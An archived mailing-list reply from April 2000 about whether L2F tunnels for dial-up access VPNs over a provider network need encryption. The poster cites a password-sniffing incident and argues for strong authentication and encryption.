Firewall Wizards mailing list archives
Re: Question about L2F tunnels
From: Aaron Turner <aturner () vicinity com>
Date: Thu, 20 Apr 2000 13:39:01 -0700 (PDT)
I had a co-worker that once worked at a high-tech company here in the Silicon Valley (gee, that narrows it a bit now don't it). He got a call from the FBI one day. Turns out someone had broken into a POP for an X.25 dialup and installed a sniffer. Apparently this setup had sniffed tens of thousands of username/passwords from hundreds of high-tech companies. The agent suggested that my co-worker force everyone change their passwords ASAP. Also what prevents someone from accidentially miss-configuring your "tunnel" so that the packets go to the wrong place? Oh, let me guess- all their employees are super-humans who make no mistakes. :) I've seen this happen once with MCI and a frame-relay connection of mine. I have no idea if it's exploitable, but it doesn't give me the warm fuzzies. I just had a discussion at our monthly BAFUG meeting. We all agreed that while many vendors would like you to believe that a VPN does not *require* encryption, none of us would be willing to accept the risks. We all wanted strong authentication (certificates or two-factor) and content encryption. YMMV. -- Aaron Turner aturner () vicinity com 650.237.0300 x252 Security Engineer Vicinity Corp. Cell: 408-314-9874 http://www.vicinity.com On Wed, 19 Apr 2000, Michele M. Jordan wrote:
Okay, I had a major provider who is doing Access VPNs tell a customer this: It is their statement that encryption is not necessary since it is not leaving the <provider's> network. The tunnel will provide the necessary security is their position. I then asked her if security wasn't necessary, then why do we need the tunnel? She said to that: "well the tunnel provides the necessary security, so encryption isn't necessary since it is going from router to router and that's the only connection that is possible. This is financial data via a dial-up to a provider pop, provider forwards an L2F tunnel request to my customer, my customer accepts the tunnel request, authenticates via remote Radius, and then initiates the tunnel. If we did do encryption, it would need to be from the provider pop to my customer's router. I think encryption is necessary, what do you think? -Michele
Current thread:
- Question about L2F tunnels Michele M. Jordan (Apr 20)
- Re: Question about L2F tunnels Aaron Turner (Apr 20)
- Re: Question about L2F tunnels Bill Pennington (Apr 21)